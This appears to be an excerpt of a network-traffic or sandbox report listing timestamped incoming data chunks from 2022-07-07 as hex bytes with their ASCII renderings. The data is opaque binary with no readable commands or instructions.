                                                                                                                                                            2022-07-07 07:51:12 UTC3030INData Raw: 29 1f 49 a0 01 16 98 1a 96 27 d7 20 cd 0c 91 76 be dd 45 9d 6c b0 7c d3 ec 37 b9 ce b3 7d ed 44 59 fe 37 7f 84 5d 77 cf ba 32 c2 e3 5d bd c8 cf cb 2a c7 47 83 11 69 c4 c3 da 80 6d 9a d1 06 73 2e 43 c1 b8 9d 05 d0 73 17 d9 dd 64 0e 68 56 f4 60 80 ab 8d 97 c0 cd cc 25 0d a4 f2 e1 d1 b5 5c 7d 49 e1 81 a5 56 96 4a 2e f3 42 00 25 c3 2d 4d d7 61 2a dd b5 8c bf 59 59 9a 19 f8 bd ed 54 7f 57 ab 90 67 30 7d c0 53 1e 15 0e 12 28 55 b2 18 cc 45 e4 29 2e 93 51 5c 2d 6d 11 13 18 f9 2f ec 2e 88 11 5d a5 b1 45 8e 54 02 6c b8 69 54 8a 16 3d 39 7b 36 41 a2 b2 2d f2 4d 57 54 08 d8 01 5a 89 4a 12 f4 c8 82 bb 9f a7 6c 9a 14 48 2a a5 e9 29 bd 06 51 dd 6b 99 3d 34 a3 ce 3f ac 71 44 bb cf 6a e3 50 c6 46 74 72 83 8e 87 b7 a2 c6 12 78 69 99 81 c3 58 a8 31 a2 e2 e5 83 a7 ea 1b 04
                                                                                                                                                            Data Ascii: )I' vEl|7}DY7]w2]*Gims.CsdhV`%\}IVJ.B%-Ma*YYTWg0}S(UE).Q\-m/.]ETliT=9{6A-MWTZJlH*)Qk=4?qDjPFtrxiX1
                                                                                                                                                            2022-07-07 07:51:12 UTC3046INData Raw: 4c 59 0b d0 3b b1 b1 0a bc ae 3e f7 e1 f2 ad cb fc 25 f8 2a 44 e3 07 a4 31 cf d9 bc 57 9c 65 84 35 66 a7 99 b6 81 c4 47 80 28 e5 23 71 c1 93 65 d8 37 13 24 9c fc 32 52 bf 19 22 c9 ab 67 4f 14 94 7c eb 06 0e c0 04 06 ce 4b 5f 3b 8d 26 88 44 b4 e1 86 11 8e 52 fe 4a 9f ae 7b 17 f8 08 df bc 89 3d 7b 39 e3 2c 89 19 0a d3 11 4d 75 53 35 26 60 db 42 52 df 23 20 a9 c6 e0 26 be 0e 86 15 93 e6 ee 39 63 0e 70 68 8b 10 ea 60 ab 80 d9 1e 05 af e3 e1 00 51 d0 8a f0 b1 0e a7 2f 93 9b 08 df cd d3 e5 96 43 72 ec 8d 5d 5f e1 20 c3 55 35 68 da 62 e4 33 22 75 88 66 b1 9e db 1b 69 02 9b ee 44 1f 1c 1d 13 11 70 1c 8b 54 d1 ef 43 9b 03 fe 82 c4 24 c9 e4 6d ba 0c 86 4b 6c e2 25 e2 10 c5 91 4a 56 d7 bb 71 cf dd 93 8a c1 e3 55 59 e0 89 ab 1e dd 4d dd 99 7d 1d 14 c1 4d 9e 11 88 20
                                                                                                                                                            Data Ascii: LY;>%*D1We5fG(#qe7$2R"gO|K_;&DRJ{={9,MuS5&`BR# &9cph`Q/Cr]_ U5hb3"ufiDpTC$mKl%JVqUYM}M
                                                                                                                                                            2022-07-07 07:51:12 UTC3062INData Raw: 4e dd 36 66 93 56 b0 5c cb ae f8 b3 c8 1f ff a0 9c 66 a7 b0 fa 76 ce 47 58 65 18 72 99 b3 51 4b cf 72 3a ae 62 4b 83 5e 69 eb d9 1f 91 a2 5b 35 a4 74 41 b2 ab d7 8d 07 37 ed b0 03 76 0e 6d cc 94 87 2a 57 79 be f5 cf 58 9f a8 43 ef fa c3 a0 5d e8 05 30 2c 91 5c 29 ba 77 b2 fa c3 00 8d 5f 55 64 fe 23 62 5c 07 ab 08 43 11 4d 0a 63 59 e1 a0 aa fc f1 1c 66 7a e8 54 0a e0 95 e9 a6 fe 9e 80 a3 38 5f 9f 98 0a fc 5b 89 ae 12 a7 56 51 d9 02 fb 48 34 b3 29 41 12 43 b4 09 4a a4 2e 63 df 31 db bb 43 de 77 4e 85 05 2e 35 a1 f1 a4 fc ad 28 66 10 93 c4 24 42 17 67 b2 a6 59 07 f8 ab 98 c2 28 29 0f b2 63 b8 4a 4c 5f 6d 79 fe af 91 0f bc 6b f7 67 cc 03 33 73 f2 d4 da 66 43 69 b2 a7 fe 29 ac 06 d2 d6 c8 64 9a 69 86 ca 13 69 34 f1 67 56 e4 1d 19 d3 78 a7 70 0f 5b c8 64 c8 01
                                                                                                                                                            Data Ascii: N6fV\fvGXerQKr:bK^i[5tA7vm*WyXC]0,\)w_Ud#b\CMcYfzT8_[VQH4)ACJ.c1CwN.5(f$BgY()cJL_mykg3sfCi)dii4gVxp[d
                                                                                                                                                            2022-07-07 07:51:12 UTC3078INData Raw: f0 47 ff 50 d0 0c e4 b9 ba a6 9b 0a 8f 5d e6 30 1d 3f 82 f1 ca 7e 39 78 cf 59 c8 37 07 84 4e ff 79 f5 b9 1b de cb 11 39 60 ce fd ec e3 21 fa 8c 36 c0 57 06 81 23 e9 82 ce 3d 5a 5b 8a cb b3 4b ef 2f a8 c3 82 cf 84 e8 8d 22 f6 cb 66 c9 44 9a 48 2d fb 40 a8 35 ae 03 1e bb 07 09 e0 45 a8 78 e8 0e bd 69 c1 9b 85 34 bc 99 94 66 e2 14 5d ec 0a 1f 75 54 1c f3 0d 1f bd a5 2e 00 13 ca 1b 4d 46 84 e2 a1 e0 8d c4 ba cb 9c 33 29 9c 3b 9d 06 49 06 c9 04 85 25 2a 92 97 26 28 78 8f f7 49 2b c1 45 a8 4f e9 e4 5f ff 0d e3 07 19 8e ad a3 fa d3 8c c3 2f f1 bf 16 a8 af e5 60 21 51 ca 4c 65 de cc c6 b8 40 fb 2d 8e 33 11 9d 33 99 f3 6e 74 5f 29 28 ac 41 42 f4 ef 7a 04 a6 da 9f 02 42 4b 89 c4 44 40 e3 db c9 0c 37 60 79 d2 d0 0b b6 57 b4 02 46 dc cd 30 a4 0b 2e ef cc b5 5b f0 d8
                                                                                                                                                            Data Ascii: GP]0?~9xY7Ny9`!6W#=Z[K/"fDH-@5Exi4f]uT.MF3);I%*&(xI+EO_/`!QLe@-33nt_)(ABzBKD@7`yWF0.[
                                                                                                                                                            2022-07-07 07:51:12 UTC3094INData Raw: ec 61 48 9c 77 7a 7e b7 00 b0 c9 53 e3 ee 07 95 d1 9f 18 de 0a ee 35 bd be 88 9a 7d f3 b5 5c fd 0a f2 e2 ec 62 af ab ba 49 59 07 21 72 f5 01 bd d4 ad f3 4e 5b b3 73 12 2f a4 c3 c0 a6 03 c5 c5 d3 f2 75 f7 4c 2d 84 9f 8b d1 ab e2 a1 0f 56 31 10 f7 46 7f 17 f4 40 8d 4e 80 d2 40 6f ae 4a 0b ea ea 38 ce 5d 96 24 80 75 8e 7c 63 2f 6c 87 c8 b5 68 70 e4 ee 3e 00 e1 9b e8 cb f9 2a 9e b9 8c 77 30 2c 80 18 58 6f 7b 04 ae 2b 2b d4 ba 54 b2 d1 fe 36 be 09 f8 3e fd dd 3b a5 89 4d 5a b3 2c 35 2b e1 89 0b a3 32 d3 a5 e6 d1 c9 81 61 d7 f7 e5 17 ca d2 fc 01 7c 0a 34 b3 ff c6 32 9c 92 2d f5 d5 14 a2 42 3b 65 66 18 ca 3d 2b eb 50 2b 19 6e e9 98 9e 36 9f 3a 63 fc 9e fc 7c 7e a0 2c 27 a1 a6 2e aa a4 12 73 e0 cb 58 1b 1d 9e 9a cf 42 cb 00 05 32 8a 81 0f cd cb ea 38 0f 77 49 a3
                                                                                                                                                            Data Ascii: aHwz~S5}\bIY!rN[s/uL-V1F@N@oJ8]$u|c/lhp>*w0,Xo{++T6>;MZ,5+2a|42-B;ef=+P+n6:c|~,'.sXB28wI
                                                                                                                                                            2022-07-07 07:51:12 UTC3110INData Raw: ab 36 e9 be e7 9f ac 70 48 02 c7 e3 3a 6a 6d 01 b3 f1 2c 57 ee 97 a7 05 42 eb 2c b5 b9 e6 9c 30 e5 c3 71 81 3c 6c e3 d1 a2 53 09 84 fa 97 c5 ea 7c dd ab b3 b8 98 97 eb 22 07 6a 81 83 0a 17 d1 2f 53 2f 94 0d 66 94 34 68 a4 47 6e ba ba ae a7 ec c9 fa ae 17 48 b8 05 8b f3 a2 66 0a 5c 79 3d 1c cb bb 4b ba a2 b4 f4 92 8c 87 c4 1b ba 1c 8c 2d 31 3a 08 06 49 13 39 f1 79 0f c7 95 ce c5 58 b6 84 59 77 8b fa b4 13 bf 4e f8 12 cd f7 91 9a 8c d7 52 42 d4 01 a9 5b 35 9a 71 fe 1e 7f 86 6d 4a 1b f1 00 f5 80 9a ed 7c 25 35 59 bb de 7d a2 72 74 1f e6 3b 4e a2 32 b4 69 f3 23 31 1d 8c f7 92 a6 03 6b 5e 75 6f 57 b5 4b 85 6f 30 da 3e d2 46 c8 f5 5f 33 cc 45 b6 6f 45 10 03 96 79 30 9e 04 17 44 b4 08 ad 11 c4 31 f4 f3 fa 4d e1 3e 0e 2a c9 68 bd c7 96 b1 4f 47 de d2 1c 1a 70 ca
                                                                                                                                                            Data Ascii: 6pH:jm,WB,0q<lS|"j/S/f4hGnHf\y=K-1:I9yXYwNRB[5qmJ|%5Y}rt;N2i#1k^uoWKo0>F_3EoEy0D1M>*hOGp
                                                                                                                                                            2022-07-07 07:51:12 UTC3126INData Raw: c1 b9 f7 02 72 1c e4 af 61 20 3d bc 85 0a ee 17 a6 9e 6b aa 69 35 43 ad 1c 09 07 bb ff 53 e8 44 a7 01 e5 46 ab 1a 36 ff 67 ac da 41 0d 20 bd f5 62 a4 f1 3a 99 8f 18 d7 6b 21 32 79 0c 79 2d f0 d7 b8 44 a1 be c0 bf f1 88 97 f2 59 1b bf f0 c1 d8 eb 11 44 e4 98 81 fc e5 d8 b1 16 fb d5 02 7d 3e 49 68 be 4b ac 38 d6 b3 4a 43 cc e9 a6 8d 63 5d cd 4b b8 e2 c6 99 c5 11 84 73 91 8b c5 4a f2 7c 81 b4 a7 84 52 13 78 44 25 b1 e9 2b f2 a2 c4 51 f3 af 3c a0 29 e9 45 65 39 dd dd 23 18 36 23 c9 a9 81 82 d6 ad ef 90 7d cc 89 13 cf ec 29 c8 bc 79 e9 7a 52 88 62 a1 a3 89 7e 8f 43 a9 3b 52 99 98 db 17 d8 d7 24 f1 25 8f 09 15 1a 3f 2e 2b f8 af b1 f2 8f 90 3f b2 15 58 88 8c 3c 71 af 49 93 7a 6e cb 9f 3b ce 77 99 7b b1 a6 78 5f d5 06 84 c7 b2 31 aa f6 c7 21 d9 01 e3 fb a8 92 12
                                                                                                                                                            Data Ascii: ra =ki5CSDF6gA b:k!2yy-DYD}>IhK8JCc]KsJ|RxD%+Q<)Ee9#6#})yzRb~C;R$%?.+?X<qIzn;w{x_1!
                                                                                                                                                            2022-07-07 07:51:12 UTC3142INData Raw: a0 03 ac 91 47 41 6c 96 41 e0 93 68 fa 81 14 b5 a6 91 46 4a 65 5d f5 6b 87 67 8b 49 a9 7f dd 00 4d f8 e9 4f 31 70 bf 12 e5 6f cd 40 2c d9 c3 d3 ef fb c1 98 7a 05 a6 8f f8 fe 01 56 70 a4 5f f4 84 15 6e 1f 00 8f 6e 93 f7 14 8f 7a 6b 0a 4d 8d 57 be d2 a6 b0 ff a7 8f 5f e9 c1 71 20 d5 b4 0c 34 27 58 67 91 37 f1 a4 25 34 03 fc 36 5c f4 56 9f 16 a7 42 49 c0 ac 4a 8c 8c af f4 41 b8 c2 a7 cd 22 c1 6e 55 76 54 01 fb 56 03 44 b5 5a 45 6b c5 d8 51 b0 2e 62 75 a2 15 9d 86 72 98 10 ac ae d3 8e 80 87 67 11 b8 8a ae fb e0 81 5e 6b e0 3d b4 08 7c 01 4f 79 ec a3 fd d6 d5 6f 36 94 ea e6 7c ac 02 96 24 03 6c 06 6b f8 29 84 35 d5 df 6f b6 fa 49 8b 5e 23 03 b5 ff 3c 61 31 c8 8b 70 87 56 ff 1a 92 67 c6 61 2e 6f 07 a5 41 69 3d f2 0f 4b 50 4e 5e 0d cb 93 85 f0 93 3d 11 a9 aa 47
                                                                                                                                                            Data Ascii: GAlAhFJe]kgIMO1po@,zVp_nnzkMW_q 4'Xg7%46\VBIJA"nUvTVDZEkQ.burg^k=|Oyo6|$lk)5oI^#<a1pVga.oAi=KPN^=G
                                                                                                                                                            2022-07-07 07:51:12 UTC3158INData Raw: b9 22 c7 53 4c b6 ac 48 a4 b8 2e 62 e3 8a 44 0b 85 26 7c d8 ef bd cb 2f aa 78 dd 03 aa ba d9 1d c8 ba d2 22 b2 46 71 0d bf a7 cd 25 cb a4 fb 38 da fa f5 dd bb 14 3e 71 12 f5 90 85 b1 54 f6 95 88 4c 37 00 62 85 fe a9 33 0f f6 ea 38 69 53 a2 d3 40 ce 12 1f 0b 34 9f ca 43 fe bf 06 ba 53 81 54 23 53 24 30 f3 ab a1 8c 56 23 18 7c 57 f8 2c 92 50 38 b9 cd ec 87 59 a1 06 61 4d fe 1f 86 9c 30 4f 9b 79 a9 3b 15 da 9a 65 88 20 98 f1 ab 20 69 5e dc 5e 1a f6 d2 c4 1b 2d ea d8 54 78 89 e2 c4 fc d0 77 5a 3b 7f 94 d5 8d de ac c3 92 c0 f2 a8 e5 ec 54 26 74 64 ac 05 1d 4a 1d 3a 8b e0 4b ee 66 16 65 8c 98 2b 41 b9 c1 dd bc 5e e2 fc fe 88 8e 65 91 b6 83 f8 2d 1d d7 41 74 ed 27 41 d6 37 b6 ae 64 c4 27 ad c4 75 e0 4d fe 60 4d d3 7d b0 63 18 f7 c0 8d 33 f1 40 b4 2d 31 10 c9 bd
                                                                                                                                                            Data Ascii: "SLH.bD&|/x"Fq%8>qTL7b38iS@4CST#S$0V#|W,P8YaM0Oy;e i^^-TxwZ;T&tdJ:Kfe+A^e-At'A7d'uM`M}c3@-1
                                                                                                                                                            2022-07-07 07:51:12 UTC3174INData Raw: 62 92 21 ef d8 d2 9b 68 d3 c9 22 5f f0 0f 91 89 b5 61 ee 31 3d 3d 75 ba c1 a6 0c 70 16 92 26 9e b4 66 bb e8 c5 55 33 c1 40 f7 d1 29 d2 73 87 c8 0b 13 03 a2 1e 73 fb d2 6d eb 29 bc 5c 3f 9e 76 b8 89 a3 5d 93 00 af 90 64 28 a4 3a 11 7b 31 55 a0 fe ea 6b 07 a0 28 1f 4b b9 5e 82 88 ea ec 33 23 32 fd 88 dc d2 d3 fc b9 5b 5e f6 7d f7 dd e7 70 06 97 c6 47 d8 77 89 ce 81 9d 88 5f ee a2 f4 12 d4 0c e6 68 6d 43 08 76 49 63 83 ba 39 0f fd 9f dc 9a cb 84 47 31 26 bf 7a 74 4f fc 8c 96 66 36 80 e2 cc 0f 91 8b 1a b4 ed 86 74 60 08 3f 45 7b 75 32 9a ff 3f ff 79 d9 80 68 20 74 26 76 07 52 94 ef 12 1b 58 60 5c b6 61 d3 37 c9 71 82 72 02 1e 91 47 eb 0d 01 7b 48 4c ba 60 13 15 6e 86 54 53 fc 1e ce 1b 7a 27 27 0d a2 b1 bc 26 1b bd 89 13 d2 68 23 fb 17 f1 21 7f b1 55 e7 d5 ff
                                                                                                                                                            Data Ascii: b!h"_a1==up&fU3@)ssm)\?v]d(:{1Uk(K^3#2[^}pGw_hmCvIc9G1&ztOf6t`?E{u2?yh t&vRX`\a7qrG{HL`nTSz''&h#!U
                                                                                                                                                            2022-07-07 07:51:12 UTC3190INData Raw: ef f6 7c af 02 16 b4 59 4c 11 d0 68 7e dd c5 3a 16 a4 8a a6 55 57 e6 c5 84 e8 53 fc a7 bc 48 73 11 0d f1 5a ae 4e 4b 58 97 be b9 ce 8e 67 9e 79 b5 cc e4 47 6a fd 71 f1 10 a6 2d 48 8c 6f 61 bb df 22 d7 60 57 49 ad c7 ed e9 58 7a 19 06 c3 7b 80 30 56 7b 49 22 5d ac aa 9c 33 d0 7f e5 af a4 b9 bf be 2d 40 37 1b 6a e0 4b b8 ea eb 9a a5 6b 3e 6f e9 12 94 bd fc 76 6d 7b 08 14 1d 89 b4 7a f3 43 c4 61 6c 79 ad d4 1b cc 5d d8 59 2e ff 58 e1 50 0a f5 3f 86 04 57 4c ab 5e 7f 52 7d 2f da bf 3f e0 68 91 19 c7 5f fc ff d6 e4 cc 29 9a 4f e8 fb 62 d7 bf 4a 0d 00 3d ef e8 c6 92 05 0f 43 d6 ac 0e 05 d0 38 99 39 17 b8 30 c9 cf 34 78 6f b1 9c 96 52 3f 82 91 97 d9 97 27 e9 4e dd 73 da e7 2c ce 50 f5 ad 7a 1b 76 a2 b2 79 ca ed 9f 43 bc 23 47 26 d5 97 8d fe b0 3c 50 b8 0e 03 83
                                                                                                                                                            Data Ascii: |YLh~:UWSHsZNKXgyGjq-Hoa"`WIXz{0V{I"]3-@7jKk>ovm{zCaly]Y.XP?WL^R}/?h_)ObJ=C8904xoR?'Ns,PzvyC#G&<P
                                                                                                                                                            2022-07-07 07:51:12 UTC3206INData Raw: 6a 11 ce 79 47 6b 72 d9 f5 53 54 50 fc 8f d2 3c 5f 11 f2 85 27 bd 12 bb 9a 3e 92 0b 9d 0c 23 0b 37 d9 39 d4 01 07 1e 79 62 98 f3 9a 0f 74 05 23 19 31 55 2a 6c e8 5d ef 1b f1 e3 57 c0 3f 94 13 12 8e 92 1a 2a 08 5c f7 51 6b 3b 7a ea ee 0f d3 53 d1 cd f9 61 f4 d4 8b b3 e4 40 11 8d 81 2c a4 0f 0d 7b 06 93 e3 e8 84 7f 56 d0 87 46 75 8b 80 00 bc b1 a0 87 f7 25 75 21 52 1f ad 0c 84 e2 f4 c8 0b 1c e6 c1 d5 25 c7 78 ac 84 ed e4 50 30 4a d5 75 97 3d 32 12 c8 3a 9a 48 1c de e4 15 9a 95 ad 68 ed 65 c0 65 2f 9b f8 19 fc ca 6e 0b dd e2 5d 1b d6 11 3c fb 3a 72 cd 02 6a f9 a9 3f 6b e6 3e 90 09 a7 46 9f bd 20 22 8a 89 bd 7c 71 6f 46 02 94 94 5d 31 b5 85 1a d6 80 45 d7 40 0c cd a9 54 bc 30 fe 91 8e ea c1 7b 1c fe df 14 0c cd 58 9f d3 65 91 ca 08 82 74 2a 6d 41 d5 f8 e7 1d
                                                                                                                                                            Data Ascii: jyGkrSTP<_'>#79ybt#1U*l]W?*\Qk;zSa@,{VFu%u!R%xP0Ju=2:Hhee/n]<:rj?k>F "|qoF]1E@T0{Xet*mA
                                                                                                                                                            2022-07-07 07:51:12 UTC3222INData Raw: 24 55 8b 50 42 42 07 a3 87 ee 05 f0 f7 68 b7 9d 46 08 19 ea 57 b1 9e d2 d8 c2 56 20 68 00 d9 dd 2d d2 dc b1 8c fa 73 07 1c 86 2f 6d 66 9a ed 04 1e e8 b4 0d 52 cf ef 8e 4a 12 dc d3 18 32 9f 7a b8 35 c3 0a d9 d2 ce 91 70 7e 44 33 c3 1b 97 3e 6d af 99 1b cc 4e 37 35 61 26 7d 66 c3 69 81 f3 7d 5d 86 e5 31 0e 16 70 73 c9 02 5f df 68 4e a0 97 24 e0 c9 b2 36 e7 c7 b1 a6 33 d6 81 1d 3c b5 ed 50 72 6a 75 c1 94 b8 8e 22 76 f2 fa ba 60 97 a5 ff 29 13 77 e0 d4 3f 95 59 c1 62 a0 ab 85 84 24 50 eb 35 e0 12 b4 99 41 d9 78 89 ac 0d ec 2f b2 af 2b 36 10 16 45 6c 22 dd 71 52 60 7a 5c c0 0e cb 39 fd d1 0c c6 f8 6e 02 b3 5a 5d 8f 35 51 ef 35 91 7e 79 d9 64 4d 20 4f cb 27 48 1e 7e 05 c4 ae bd d7 85 e9 68 c7 30 15 c0 fc e2 f8 36 06 5c 57 ee 3f 97 e7 28 81 c9 c4 b1 47 cf 16 7a
                                                                                                                                                            Data Ascii: $UPBBhFWV h-s/mfRJ2z5p~D3>mN75a&}fi}]1ps_hN$63<Prju"v`)w?Yb$P5Ax/+6El"qR`z\9nZ]5Q5~ydM O'H~h06\W?(Gz
                                                                                                                                                            2022-07-07 07:51:12 UTC3238INData Raw: 6a 17 54 87 ff 72 ff 58 50 a1 ff e1 8c 96 4b c4 d1 86 14 3f 36 9d c5 0f 02 64 c3 4f bf 1c 60 ff 5e ee 64 a9 e6 20 af 8d 34 1b 0e ae 86 cf 8c 88 70 5c 6f bc 38 74 17 27 ef 55 0b cb af db f7 9a b8 ec e4 66 96 f4 16 fc 42 b4 02 6a f2 fd f5 a4 86 be 1d de cc f2 c5 35 34 a6 60 a9 43 fd bc 87 23 3d 27 f4 c6 39 ad 8a 4a ff 65 2f ad 6e bd 8c e5 3a 8f ce 75 9d 7a 54 5e 3f 5d 84 61 62 7b 83 60 c0 d2 e4 d2 23 0b 7b 11 70 88 a9 de 96 a6 2c 47 0e c9 18 ec 79 df d2 29 b4 92 08 31 98 a3 5a 77 a2 93 80 5f a5 11 f4 15 93 a9 0d f2 af 6c 6b e0 7a 3a 5a 69 a4 31 62 e9 dc 9b 42 dd 4b ee 88 cf ea b8 53 cb 45 26 a2 51 e7 bf c3 73 4c 88 0b ec d2 b7 47 79 1a b2 63 41 00 59 3c e8 8a 37 29 97 85 22 d5 c8 b7 54 09 da d9 09 f2 cf 3a f3 07 61 41 b0 3d 32 d8 5e e1 32 81 16 e8 9e f2 cb
                                                                                                                                                            Data Ascii: jTrXPK?6dO`^d 4p\o8t'UfBj54`C#='9Je/n:uzT^?]ab{`#{p,Gy)1Zw_lkz:Zi1bBKSE&QsLGycAY<7)"T:aA=2^2
                                                                                                                                                            2022-07-07 07:51:12 UTC3254INData Raw: 08 06 bc e2 45 10 4c 97 63 cf 3e b4 0f ad 8b 95 64 1a fc 49 8e 41 8f 71 40 f8 06 35 98 5d 3d 80 5e 24 b6 ae a9 49 54 0f 0f f9 8c cb 7a 23 c6 ad c7 31 cc 89 11 33 17 8e 6d 58 aa ff 0d e1 57 53 b5 cb ec 21 b6 d1 e9 b4 9f bb db a3 c2 64 fc 3d 6b 2d be 8f bf 66 6a 95 01 70 cc 94 d7 7e 55 24 d0 5d 17 1e 7a a2 fe 65 3f 93 e0 7a 01 73 00 74 c9 8d f4 a5 0d d2 a3 0a 19 75 d3 dd 93 f7 ff 34 c0 a6 2f ae f2 0a fd 8e 51 03 8b f4 d8 d5 76 e3 3f 1b 4c c7 d8 38 1e f5 04 26 87 a2 e2 77 44 63 8b 80 fd 68 36 ba bc b9 ca 17 2a 2c a5 5b 62 1e af 37 84 9e b6 f3 e6 62 4f 98 04 0a db 76 61 dc 01 70 ac 83 ef 84 d4 05 54 06 e2 61 8b 3b c8 db 2d ee 81 b0 fb 5c 36 8f bc 91 b5 f4 b0 23 b2 61 85 5a 6e 9a 4b 6d 2a c4 04 9e f7 c3 6b 55 0d 40 f6 3b 13 a8 5e a7 20 5a f4 5d 88 dc 6d 3d 5d
                                                                                                                                                            Data Ascii: ELc>dIAq@5]=^$ITz#13mXWS!d=k-fjp~U$]ze?zstu4/Qv?L8&wDch6*,[b7bOvapTa;-\6#aZnKm*kU@;^ Z]m=]
                                                                                                                                                            2022-07-07 07:51:12 UTC3270INData Raw: 5f 7d af 15 ef dd de be c1 44 ba 06 dc 5c ec 58 5a b7 2c c7 ea a9 09 e3 a8 96 29 f0 4a 40 f1 d2 a3 f2 aa 31 a9 59 b6 f7 ac 71 b5 e7 8d d8 01 dc d1 bf a3 7c a9 b7 56 69 ba 19 47 c7 1d 10 81 82 66 a2 bb 05 e3 0d a4 fa 66 0e 62 b2 aa 1c 28 02 7d bd d3 4c a9 7d 5d ff 9d 2a 01 19 0f 3c 31 b6 eb 36 92 04 3b 80 a1 27 5f 03 01 f9 81 5c 19 1a e9 e6 9d 5a 51 6f 48 a9 6b 96 1c 61 bf 2f ba 3e 2d 2d 17 93 d6 9f 31 9c 88 ca 87 a1 b8 02 a1 c9 ae c3 60 f0 95 54 3d 0a 3b ac 0c aa b9 7c e6 5e 1c e9 cc c5 6b c8 7c be af ae 63 47 ae 27 82 2d 6d de 9c ae 38 b7 2a df 3a 68 a5 a3 ba 7f a6 41 2d 23 9a 11 76 b0 e1 1d 01 3b 19 68 66 0e af 33 92 88 af 3c 82 c2 89 4e d5 0e 49 99 4b 8d 8b 38 85 3c c5 6c e3 2b fe 92 0a d1 d6 b9 1b a2 c6 78 4d 6b 6a 74 97 71 9d 2c 8d 5a 53 a5 c2 d7 ce
                                                                                                                                                            Data Ascii: _}D\XZ,)J@1Yq|ViGffb(}L}]*<16;'_\ZQoHka/>--1`T=;|^k|cG'-m8*:hA-#v;hf3<NIK8<l+xMkjtq,ZS
                                                                                                                                                            2022-07-07 07:51:12 UTC3286INData Raw: 7c cc 01 ea 61 c2 34 a6 3a 33 34 b4 68 6d a7 eb 16 af 6b ad e4 60 d5 2a 9b 98 17 b1 05 ab 65 96 7b 8d 18 d4 82 fb d1 83 00 5e 01 e4 37 39 f3 0c eb c5 dc 1d 06 cb 34 91 d7 42 dd ad a0 8d d0 ca 4d 59 1b 25 ef 9e 78 2e 55 dc 7a 8f ae 42 24 65 5d 1b d5 5e e4 c4 0b aa 66 ad cd 7c 1f 51 7e 70 ff d4 88 e5 2e de 3a c4 e1 e0 59 6c 19 c1 8e bf a2 0a 11 4e 55 1b 0e d9 88 72 17 43 49 f2 b3 d3 12 96 89 5e 3c 36 c2 21 12 56 10 7d 4c f8 a4 35 5f af c7 e3 30 93 2f 07 6b 8d d8 68 17 d9 02 8b 58 a9 f4 04 b6 fa 26 b5 25 49 a6 19 c5 b2 31 d3 dd 57 95 7c b3 5c 2d ec dc ff 42 40 01 44 59 e3 2c cb c0 eb 23 58 a0 7b 03 a1 b6 63 fd 5e 9e 36 42 c2 2e 3c 67 ba 28 62 cc a7 a1 f7 12 10 5a d9 b0 dc 65 73 11 95 ba 4d 53 41 e4 8b be 32 13 9a b0 b1 8d 61 a1 16 16 b2 09 01 43 c0 3a 90 7e
                                                                                                                                                            Data Ascii: |a4:34hmk`*e{^794BMY%x.UzB$e]^f|Q~p.:YlNUrCI^<6!V}L5_0/khX&%I1W|\-B@DY,#X{c^6B.<g(bZesMSA2aC:~
                                                                                                                                                            2022-07-07 07:51:12 UTC3302INData Raw: 77 fe 29 59 57 45 14 5f 3f 14 ac 5e 8a 16 1c 4d ab 72 04 00 b3 a1 84 cf 15 cb 05 e5 ca ba 8c 2b 41 b5 8d 63 87 6c ac a4 2d 3d 63 6b 8f fb 32 22 41 8e 6a 4d 61 34 e0 7c 2d 27 3c 7c 5b ac 02 d5 0b 7c 4b 77 2a cb d4 c7 91 b5 4d 25 6b f6 59 2c c1 95 17 25 e1 37 66 76 84 b6 00 8e 60 1f eb 0f 03 57 ae b2 2e d7 bd 1f ae 31 1d 67 f2 98 ca aa e3 23 dc fb 14 3c e0 8b ea 7a 2a 1c 2b a5 69 2a 98 29 38 47 86 0b 4d 64 59 2a fa a9 d5 1e d9 6a a4 87 d9 71 0c 8d a8 45 93 11 bf 11 49 58 d0 24 d0 0c 41 a8 64 f0 75 12 f0 98 fb 45 34 38 57 ca c2 51 36 d2 5f 73 66 7e a6 c9 29 69 2d f9 5f f0 74 c2 41 85 88 b2 a7 65 7f 54 0c 8b 99 81 71 1c 6a 77 66 c4 1e 01 b8 b8 78 ba 4c 93 7a d2 83 0a 2b 02 95 10 2d c3 68 86 65 dc 34 ac f2 21 ed 74 8d 12 41 63 e5 8b 1d 5e 34 ad 43 e8 71 2c 22
                                                                                                                                                            Data Ascii: w)YWE_?^Mr+Acl-=ck2"AjMa4|-'<|[|Kw*M%kY,%7fv`W.1g#<z*+i*)8GMdY*jqEIX$AduE48WQ6_sf~)i-_tAeTqjwfxLz+-he4!tAc^4Cq,"
                                                                                                                                                            2022-07-07 07:51:12 UTC3318INData Raw: 15 bb c3 69 97 03 68 6c 92 80 67 2d 2b 99 ee b7 22 3b c9 b3 33 f5 b1 03 f1 67 a6 62 53 2f c4 4b 4c d3 90 ab c5 b9 cd 49 b1 5c ac bb b9 45 a8 95 c0 fa 95 ee 77 52 a7 56 04 6b 78 00 bc 93 e6 2e ce fc 62 2a 5b 93 ff a1 c6 c4 f9 43 cb 21 2d 31 16 68 24 e1 a6 37 30 1d 44 a5 a2 de ff 9b 73 6a d0 ff 90 2f d0 21 e6 3c 06 b9 63 3b 23 d6 24 94 7d 18 e8 81 8d be d6 9c 1c 14 c2 4d b6 e8 7c 1f 08 fd c9 22 83 d3 98 1b 35 ff 98 27 7e 9f fa 6c bd 8f 15 17 ac e9 f1 eb 5f e3 2d 90 75 b8 b4 17 c6 3f f4 83 6e 04 30 a8 e3 a3 e2 17 4c 6d 2f 9a fd 59 e1 52 f1 f3 9b ba 5e 22 29 14 65 5c 9c ef 48 38 39 e3 f2 f7 42 b4 31 96 83 50 ce 72 bb f3 6f 86 83 e4 13 f6 4b a9 48 e0 58 8f 02 96 34 33 ea 1f db f1 1b 12 bc 45 d2 ed 1b 8f db 48 63 5f 3d b1 c9 ec 61 2c 5a e8 62 fb 4b 7c 0c 2f 66
                                                                                                                                                            Data Ascii: ihlg-+";3gbS/KLI\EwRVkx.b*[C!-1h$70Dsj/!<c;#$}M|"5'~l_-u?n0Lm/YR^")e\H89B1ProKHX43EHc_=a,ZbK|/f
